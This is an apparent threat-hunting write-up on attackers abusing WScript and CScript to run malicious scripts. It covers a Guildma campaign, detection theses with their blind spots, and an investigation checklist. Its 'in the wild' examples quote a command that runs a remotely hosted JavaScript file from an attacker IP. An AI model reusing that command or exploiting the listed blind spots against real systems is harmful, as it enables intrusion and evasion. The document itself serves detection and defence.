Attack technique
Technique name: Suspicious Script Execution Via Script Interpreters (WScript/CScript)
MITRE ATT&CK
- Tactic: Execution
- Technique: Command and Scripting Interpreter
Technique description
As security defenses evolve, threat actors turn to native tools and built-in functionality to carry out malicious activity covertly. Scripting languages (such as JavaScript or VBScript) offer attackers a versatile and easily accessible toolkit: they can build capable malware from existing features that interact directly with the OS and the network. These languages also make it easy to obfuscate code, complicating detection and analysis. Additionally, because scripting languages are higher level than languages like C or C++, they present a user-friendly entry point and are easier for attackers to learn and take advantage of. They also allow quick modification of malware variants without recompiling code. Given these factors, malicious scripts are an attractive technique for threat actors, and we've seen a surge in their use in recent months.
Insights from threat intelligence
In a recent campaign by Guildma, we observed the use of WScript to run remotely hosted JavaScript in an attempt to download an infostealer that gathers sensitive information from the infected system. The JavaScript spawns CMD to launch the next stage of the attack. This aligns with the common technique of threat actors who leverage scripting languages to execute additional LOLBINs and remain stealthy in their campaigns.
In the wild examples
- WScript.exe "\172[.]86.75.128@8080\pub\iXklskEJ6J5sFz9UtJskfIcRT.jse"
- CScript.exe "MANAGI~1.JS"
References
- New SugarGh0st RAT targets Uzbekistan government and South Korea
- Dissecting the Menacing New InfoStealer Campaign Targeting Mexico
- Qbot - Red Canary Threat Detection Report
- Are DarkGate and PikaBot the New QakBot? | Cofense
- X (formerly Twitter) | Cryptolaemus
- X (formerly Twitter) | Kostas
Threat hunting theses breakdown
CMD or Powershell spawned by a newly created script
Relevant data sources: EDR Logs
Thesis explanation
A malicious script is created on a host and subsequently executed with WScript.exe or CScript.exe. This execution can occur either when a user is tricked into clicking on it or programmatically as part of a prior stage of the attack. The thesis focuses on script files that are rarely created on organizational hosts.
Blind spots
- Scripts that are created more than 5 minutes before their execution are out of scope in this thesis.
- Scripts that are observed on 10 or more hosts are out of scope in this thesis.
Execution of a newly created script file with an invalid extension
Relevant data sources: EDR Logs
Thesis explanation
A malicious script is created on a host and subsequently executed with WScript.exe or CScript.exe. This execution can occur either when a user is tricked into clicking on it or programmatically as part of a prior stage of the attack. The thesis focuses on script files that are rarely created on organizational hosts and don't have a valid script file extension. Threat actors may use a different extension to disguise the file type and evade detection.
Blind spots
- Scripts that are created more than 5 minutes before their execution are out of scope in this thesis.
- Scripts that are observed on 10 or more hosts are out of scope in this thesis.
Outbound connection initiated by a newly created script
Relevant data sources: EDR Logs
Thesis explanation
A malicious script is created on a host and subsequently executed with WScript.exe or CScript.exe. This execution can occur either when a user is tricked into clicking on it or programmatically as part of a prior stage of the attack. The thesis focuses on script files that are rarely created on organizational hosts and generate an outbound network connection to an external IP or domain. Threat actors commonly use this technique to download the next stage of the attack.
Blind spots
- Scripts that are created more than 5 minutes before their execution are out of scope in this thesis.
- Scripts that are observed on 10 or more hosts are out of scope in this thesis.
Execution of a newly created script file with a single character name
Relevant data sources: EDR Logs
Thesis explanation
A malicious script is created on a host and subsequently executed with WScript.exe or CScript.exe. The script's file name consists of a single character only, as observed in various recently reported Pikabot campaigns (e.g. Q.js). This execution can occur either when a user is tricked into clicking on it or programmatically as part of a prior stage of the attack. The thesis focuses on script files that are rarely created on organizational hosts and have a single-character file name.
Blind spots
- Scripts that are created more than 5 minutes before their execution are out of scope in this thesis.
- Scripts that are observed on 10 or more hosts are out of scope in this thesis.
Recommended investigation flow
- Determine which scripting language was used, according to the file extension or the //E:<engine> switch in the WScript/CScript command line, if provided.
- Investigate the origin of the script file. Was it downloaded from the internet? Is it part of an authorized software suite?
- Analyze the behavior of the script execution, including any interactions with files and processes. Are there any unusual activities?
- Investigate outbound network connections initiated by the suspicious script. Does it interact with an external IP or domain? (This may indicate an exfiltration attempt or the download of a later stage.)
- Cross-reference the script hash (if available) and any contacted IP/domain with threat intelligence feeds to identify known malicious entities.
- Review historical data to identify any similar script executions or related activities. On how many machines was the script name or command line observed?
- Did the execution involve user interaction (for example, extraction of the script file from an archive by the user using WinRAR.exe and execution under OpenWith.exe or Explorer.exe), or was it initiated by another program?
Hunting queries
EDR: